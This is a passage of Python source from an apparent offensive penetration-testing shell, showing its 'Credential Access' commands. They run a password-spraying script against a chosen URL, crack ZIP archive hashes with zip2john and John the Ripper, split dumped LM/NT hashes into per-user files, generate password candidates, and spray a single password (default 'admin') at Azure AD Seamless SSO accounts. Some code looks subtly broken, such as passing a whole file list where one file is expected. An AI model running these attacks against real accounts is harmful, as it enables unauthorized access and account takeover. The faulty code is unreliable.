            usernames = input(f"    [?] Enter the path to the usernames file (default {users}): ").strip() or users
            passwords = input(f"    [?] Enter the path to the passwords file (default {password}): ").strip() or password
            verbose = input("    [?] Enable verbose mode? (yes/no, default 'no'): ").strip().lower() or "no"
            timeout = input("    [?] Set timeout (in seconds, default 10): ").strip() or "10"
        else:
            args = line.split()
            url = args[0] if len(args) > 0 else url
            usernames = args[1] if len(args) > 1 else users
            passwords = args[2] if len(args) > 2 else wordlist
            verbose = "yes" if "--verbose" in args else "no"
            timeout = args[args.index("--timeout") + 1] if "--timeout" in args else "10"

        if not url or not usernames or not passwords:
            print_warn("Missing required arguments (URL, usernames, or passwords). Aborting...")
            return

        verbose_option = "--verbose" if verbose == "yes" else ""
        timeout_option = f"--timeout {timeout}"

        command = f"python3 {cubespraying_dir}/cubeSpraying.py --url {url} --usernames {usernames} --passwords {passwords} {verbose_option} {timeout_option}"

        print_msg(f"Running CubeSpraying attack: {command}")
        self.cmd(command)
        return

    @cmd2.with_category("07. Credential Access")
    def do_john2zip(self, line):
        """
        List all .zip files in the 'sessions' directory, let the user select one, and run the command
        `zip2john {selected_file} > sessions/hash.txt`.
        Then, run John the Ripper to crack the hash using the RockYou wordlist with multiple forks.

        Parameters:
        line (str): An optional string parameter. This can be used for any additional input, though
                    it's not needed in this specific command.

        Returns:
        None
        """
        sessions_dir = 'sessions'
        path = os.getcwd()
        output_dir = f"{path}/{sessions_dir}/"
        zip_files = get_users_dic("zip")

        if not is_binary_present("zip2john"):
            print_warn("zip2john not found installing...")
            self.cmd("sudo apt install zip2john -y")

        if not zip_files:
            print_error("No .zip files found in the 'sessions' directory.")
            return

        selected_file = zip_files

        selected_file_path = os.path.join(sessions_dir, selected_file)

        hash_file_path = os.path.join(sessions_dir, 'hash.txt')

        if os.path.exists(hash_file_path):
            timestamp = time.strftime("%Y%m%d-%H%M%S")
            backup_hash_file = os.path.join(sessions_dir, f"hash_{timestamp}.txt")
            os.rename(hash_file_path, backup_hash_file)
            print_warn(f"Existing hash.txt file backed up as: {backup_hash_file}")

        command = f"sudo zip2john {selected_file_path} > {hash_file_path}"
        try:
            print_msg(command)
            self.cmd(command)
            print_msg(f"Hash saved in: {hash_file_path}")
        except Exception as e:
            print_error(f"Error executing command: {str(e)}")
            return

        wordlist_path = "/usr/share/wordlists/rockyou.txt"
        john_command = f"sudo john {hash_file_path} -w={wordlist_path} --fork=4"
        try:
            print_msg(john_command)
            self.cmd(john_command)
            password = input("    [!] Enter the password cracked(default: admin): ") or "admin"
            command = f"unzip -P {password} {selected_file_path} -d {output_dir}"
            print_msg(command)
            self.cmd(command)

        except Exception as e:
            print_error(f"Error executing John the Ripper: {str(e)}")

    @cmd2.with_category("07. Credential Access")
    def do_createusers_and_hashs(self, line):
        """
        Command createusers_and_hashs: Extracts usernames and hashes from a dump file.

        This function opens a nano editor for the user to input the contents of a
        file in the format:

            username:UID:LM_HASH:NT_HASH:::

        Once the data is entered and saved, the function generates:
        1. A file named `usernames_{self.params['rhost']}.txt` containing all usernames.
        2. Individual files named `hash_{username}.txt` for each user, containing
        the user's LM and NT hash in the format `LM_HASH:NT_HASH`.

        Args:
            line (str): Unused parameter, kept for consistency.

        Returns:
            None
        """
        self.params['rhost']
        domain = get_domain(self.params['url'])
        path = os.getcwd()
        sessions= f"{path}/sessions"
        dump_file = f"{sessions}/dump.txt"
        self.cmd(f"nano {dump_file}")

        usernames_file = f"{sessions}/usernames_{self.params['domain']}.txt"
        with open(dump_file) as dump, open(usernames_file, "w") as users:
            for line in dump:
                try:
                    username, _, lm_hash, nt_hash, *_ = line.strip().split(":")
                    users.write(f"{username}\n")
                    with open(f"{sessions}/hash_{username}.txt", "w") as hash_file:
                        hash_file.write(f"{lm_hash}:{nt_hash}")
                except ValueError:
                    continue

        print_msg(f"Usernames saved to {usernames_file}")
        print_msg("Hashes saved in individual files per user.")
        return

    @cmd2.with_category("07. Credential Access")
    def do_refill_password(self, line):
        """Generate a list of possible passwords by filling each asterisk in the input with user-specified characters.

        :param line: A string containing asterisks (e.g., WebAO***7) for generating variations.

        :returns: None

        Process:
        Prompts the user to enter characters to replace each asterisk, creates all possible combinations,
        and saves them to 'sessions/passwords_refilled.txt'. If this file exists, the previous version is
        renamed with a timestamp suffix.
        """
        path = os.getcwd()
        output_dir = f"{path}/sessions"
        output_file = os.path.join(output_dir, "passwords_refilled.txt")
        if not os.path.exists(output_dir):
            os.makedirs(output_dir)

        if os.path.isfile(output_file):
            timestamp = time.strftime("%Y%m%d_%H%M%S")
            os.rename(output_file, os.path.join(output_dir, f"passwords_refilled_{timestamp}.txt"))

        characters = input("    [!] Enter characters to replace '*': (default: 0123456789) ") or '0123456789'
        password_base = list(line)
        asterisk_positions = [i for i, char in enumerate(password_base) if char == '*']

        combinations = itertools.product(characters, repeat=len(asterisk_positions))
        with open(output_file, "w") as f:
            for combo in combinations:
                for pos, char in zip(asterisk_positions, combo):
                    password_base[pos] = char
                f.write("".join(password_base) + "\n")

        print_msg(f"Password variations saved to: {output_file}")

    @cmd2.with_category("07. Credential Access")
    def do_rocky(self, line):
        """
        Reduces a wordlist based on the specified password length.

        This function filters the provided wordlist to only include passwords
        that match the specified length. If no length is provided, it defaults
        to 4. The function constructs a grep command to achieve this and executes
        it.

        Usage:
            do_rocky(line: str)

        :param line: The length of the passwords to filter in the wordlist.
                    This parameter should be a string representing a positive integer.
                    If not provided, the function prompts the user for input.
        :type line: str
        :raises ValueError: If the provided length is not a valid positive integer.

        Example:
            do_rocky('8')
            # Executes: grep '^.\\{8\\}$' /usr/share/wordlists/rockyou.txt > sessions/lazypass_mini_rocky.txt
        """
        wordlist = self.params['wordlist']

        if not line:
            line = input("    [!] Enter the lenght of the passwords to reduce your wordlist(default 4): ") or '4'

        if not line.isdigit() or int(line) <= 0:
            print_error("Length must be a positive integer.")
            return

        command = "grep '^.\\{" + str(line) + "\\}$' " + wordlist + " > sessions/lazypass_mini_rocky.txt"
        print_msg(command)
        self.cmd(command)

    @cmd2.with_category("07. Credential Access")
    def do_adsso_spray(self, line):
        """
        Performs a password spray attack on Azure Active Directory Seamless Single Sign-On (SSO) using a specified list of users.

        This function automates the process of spraying a given password across multiple user accounts in a target self.params['domain']. It utilizes
        a user list in the form of a text file, targeting Azure AD Seamless SSO endpoints. The results are processed and saved to
        a specified output file, providing insights into which accounts were successful or failed during the attack.

        Requirements:
            - A valid self.params['domain'] and URL for the target Azure AD instance. (assing url https://url.com)
            - A user dictionary file containing usernames (without the self.params['domain']) to be sprayed.

        Parameters:
            line (str): Command-line input passed to the function (not currently used in the function).

        Behavior:
            - Loads the self.params['domain'] and URL from the configuration stored in `self.params`.
            - Reads the user list from a file specified in `get_users_dic`.
            - Sprays the specified password to all users and processes the results.
            - Saves the successful and failed attempts to the output file.

        Example:
            - Perform a password spray attack with the password "admin" and save the results:
                >>> adsso_spray
            - Customize the password or user list by modifying `self.params` before invoking the function.

        """
        domain = self.params['domain']
        url = self.params['url']
        users_dic = get_users_dic("txt")
        path = os.getcwd()
        sessions = f"{path}/sessions"
        output_file = f"{sessions}/adsso_stpray_{self.params['domain']}.txt"
        password = input("    [!] Password to spray. Defaults to admin: ") or 'admin'
        wait = input("    [!] Number of seconds to sleep between individual user attempts default 0: ") or '0'
        users = []

        for line in users_dic:
            users.append(line.split('@')[0].strip())


        results = Spray(self.params['domain'], users, password, url, wait, True, False)
        ProcessResults(results, output_file)
        return


import utils as _lazy_utils
for _lazy_name in dir(_lazy_utils):
    if not _lazy_name.startswith('_'):
        globals().setdefault(_lazy_name, getattr(_lazy_utils, _lazy_name))
del _lazy_utils, _lazy_name
__all__ = ["CredMigratedCommandSet"]
